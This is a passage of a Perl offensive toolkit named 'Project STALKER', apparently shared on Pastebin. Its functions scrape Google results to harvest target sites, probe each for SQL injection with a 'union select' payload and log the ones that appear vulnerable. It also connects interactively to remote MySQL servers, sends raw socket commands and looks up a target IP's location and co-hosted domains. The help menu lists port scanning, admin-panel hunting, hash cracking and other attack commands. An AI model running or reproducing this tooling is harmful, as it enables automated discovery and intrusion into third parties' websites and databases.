  1714. for ( $pages = 10 ; $pages <= $b ; $pages = $pages + 10 ) {
  1715. $code = toma(
  1716. "http://www.google.com.ar/search?hl=&q=" . $a . "&start=$pages" );
  1717. my @links = get_links($code);
  1718. for my $l (@links) {
  1719. if ( $l =~ /webcache.googleusercontent.com/ ) {
  1720. push( @url, $l );
  1721. }
  1722. }
  1723. }
  1724.  
  1725. for (@url) {
  1726. if ( $_ =~ /cache:(.*?):(.*?)\+/ ) {
  1727. push( @founds, $2 );
  1728. }
  1729. }
  1730.  
  1731. my @founds = repes(@founds);
  1732.  
  1733. return @founds;
  1734. }
  1735.  
  1736. sub sql {
  1737.  
  1738. my ( $pass1, $pass2 ) = ( "+", "--" );
  1739. my $page = shift;
  1740. $code1 =
  1741. toma( $page . "-1"
  1742. . $pass1 . "union"
  1743. . $pass1
  1744. . "select"
  1745. . $pass1 . "666"
  1746. . $pass2 );
  1747. if ( $code1 =~
  1748. /The used SELECT statements have a different number of columns/ig )
  1749. {
  1750. print "[+] SQLI : $page\a\n";
  1751. saveyes( "logs/sql-logs.txt", $page );
  1752. }
  1753. }
  1754.  
  1755. sub get_links {
  1756.  
  1757. $test = HTML::LinkExtor->new( \&agarrar )->parse( $_[0] );
  1758. return @links;
  1759.  
  1760. sub agarrar {
  1761. my ( $a, %b ) = @_;
  1762. push( @links, values %b );
  1763. }
  1764. }
  1765.  
  1766. sub repes {
  1767. foreach $test (@_) {
  1768. push @limpio, $test unless $repe{$test}++;
  1769. }
  1770. return @limpio;
  1771. }
  1772.  
  1773. sub head {
  1774. cprint "\x0311"; #13
  1775. print "\n\n-- == Project STALKER == --\n\n";
  1776. cprint "\x030";
  1777. }
  1778.  
  1779. sub copyright {
  1780. cprint "\x0311"; #13
  1781. print "\n\n(C) Doddy Hackman 2012\n\n";
  1782. cprint "\x030";
  1783. }
  1784.  
  1785. sub toma {
  1786. return $nave->get( $_[0] )->content;
  1787. }
  1788.  
  1789. sub tomax {
  1790. return $nave->get( $_[0] );
  1791. }
  1792.  
  1793. sub tomar {
  1794. my ( $web, $var ) = @_;
  1795. return $nave->post( $web, [ %{$var} ] )->content;
  1796. }
  1797.  
  1798. sub conectar {
  1799.  
  1800. my $sockex = new IO::Socket::INET(
  1801. PeerAddr => $_[0],
  1802. PeerPort => $_[1],
  1803. Proto => "tcp",
  1804. Timeout => 5
  1805. );
  1806.  
  1807. print $sockex $_[2] . "\r\n";
  1808. $sockex->read( $re, 5000 );
  1809. $sockex->close;
  1810. return $re . "\r\n";
  1811. }
  1812.  
  1813. sub enter {
  1814.  
  1815. my ( $host, $user, $pass ) = @_;
  1816.  
  1817. print "[+] Connecting to the server\n";
  1818.  
  1819. $info = "dbi:mysql::" . $host . ":3306";
  1820. if ( my $enter = DBI->connect( $info, $user, $pass, { PrintError => 0 } ) )
  1821. {
  1822.  
  1823. print "\n[+] Enter in the database";
  1824.  
  1825. while (1) {
  1826. print "\n\n\n[+] Query : ";
  1827. chomp( my $ac = <stdin> );
  1828.  
  1829. if ( $ac eq "exit" ) {
  1830. $enter->disconnect;
  1831. print "\n\n[+] Closing connection\n\n";
  1832. last;
  1833. }
  1834.  
  1835. $re = $enter->prepare($ac);
  1836. $re->execute();
  1837. my $total = $re->rows();
  1838.  
  1839. my @columnas = @{ $re->{NAME} };
  1840.  
  1841. if ( $total eq "-1" ) {
  1842. print "\n\n[-] Query Error\n";
  1843. next;
  1844. }
  1845. else {
  1846. print "\n\n[+] Result of the query\n";
  1847. if ( $total eq 0 ) {
  1848. print "\n\n[+] Not rows returned\n\n";
  1849. }
  1850. else {
  1851. print "\n\n[+] Rows returned : " . $total . "\n\n\n";
  1852. for (@columnas) {
  1853. print $_. "\t\t";
  1854. }
  1855. print "\n\n";
  1856. while ( @row = $re->fetchrow_array ) {
  1857. for (@row) {
  1858. print $_. "\t\t";
  1859. }
  1860. print "\n";
  1861. }
  1862. }
  1863. }
  1864. }
  1865. }
  1866. else {
  1867. print "\n[-] Error connecting\n";
  1868. }
  1869. }
  1870.  
  1871. sub encode {
  1872. my $string = $_[0];
  1873. $hex = '0x';
  1874. for ( split //, $string ) {
  1875. $hex .= sprintf "%x", ord;
  1876. }
  1877. return $hex;
  1878. }
  1879.  
  1880. sub saveyes {
  1881. open( SAVE, ">>" . $_[0] );
  1882. print SAVE $_[1] . "\n";
  1883. close SAVE;
  1884. }
  1885.  
  1886. sub savefile {
  1887. open( SAVE, ">>logs/webs/" . $_[0] );
  1888. print SAVE $_[1] . "\n";
  1889. close SAVE;
  1890. }
  1891.  
  1892. sub coleccionar {
  1893. opendir DIR, $_[0];
  1894. my @archivos = readdir DIR;
  1895. close DIR;
  1896. return @archivos;
  1897. }
  1898.  
  1899. sub infocon {
  1900. my $target = shift;
  1901.  
  1902. my $get = gethostbyname($target);
  1903. my $target = inet_ntoa($get);
  1904.  
  1905. print "[+] Getting info\n\n\n";
  1906. $total =
  1907. "http://www.melissadata.com/lookups/iplocation.asp?ipaddress=$target";
  1908. $re = toma($total);
  1909.  
  1910. if ( $re =~ /City<\/td><td align=(.*)><b>(.*)<\/b><\/td>/ ) {
  1911. print "[+] City : $2\n";
  1912. }
  1913. else {
  1914. print "[-] Not Found\n";
  1915. copyright();
  1916. }
  1917. if ( $re =~ /Country<\/td><td align=(.*)><b>(.*)<\/b><\/td>/ ) {
  1918. print "[+] Country : $2\n";
  1919. }
  1920. if ( $re =~ /State or Region<\/td><td align=(.*)><b>(.*)<\/b><\/td>/ ) {
  1921. print "[+] State or Region : $2\n";
  1922. }
  1923.  
  1924. print "\n\n[+] Getting Hosts\n\n\n";
  1925.  
  1926. my $code = toma( "http://www.ip-adress.com/reverse_ip/" . $target );
  1927.  
  1928. while ( $code =~ /whois\/(.*?)\">Whois/g ) {
  1929. my $dns = $1;
  1930. chomp $dns;
  1931. print "[DNS] : $dns\n";
  1932. }
  1933. }
  1934.  
  1935. sub helpme {
  1936.  
  1937. cprint "\x036";
  1938. print qq(
  1939.  
  1940. [+] Commands :
  1941.  
  1942. [++] getip <host>
  1943. [++] getlink <page>
  1944. [++] getprocess
  1945. [++] killprocess <pid process>
  1946. [++] conec <host> <port> <command>
  1947. [++] allow <host>
  1948. [++] paths <page>
  1949. [++] encodehex <text>
  1950. [++] decodehex <text>
  1951. [++] encodeascii <text>
  1952. [++] decodeascii <text>
  1953. [++] encodebase <text>
  1954. [++] decodebase <text>
  1955. [++] scanport <host>
  1956. [++] panel <page>
  1957. [++] getpass <hash>
  1958. [++] kobra <page>
  1959. [++] ftp <host> <user> <pass>
  1960. [++] mysql <host> <user> <pass>
  1961. [++] locate <ip>
  1962. [++] whois <dom>
  1963. [++] navegator
  1964. [++] scangoogle
  1965. [++] help
  1966. [++] exit
  1967. );
  1968. cprint "\n\n\n\x030";
  1969. }
  1970.  
  1971. #
  1972. # The End ?
  1973. #
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!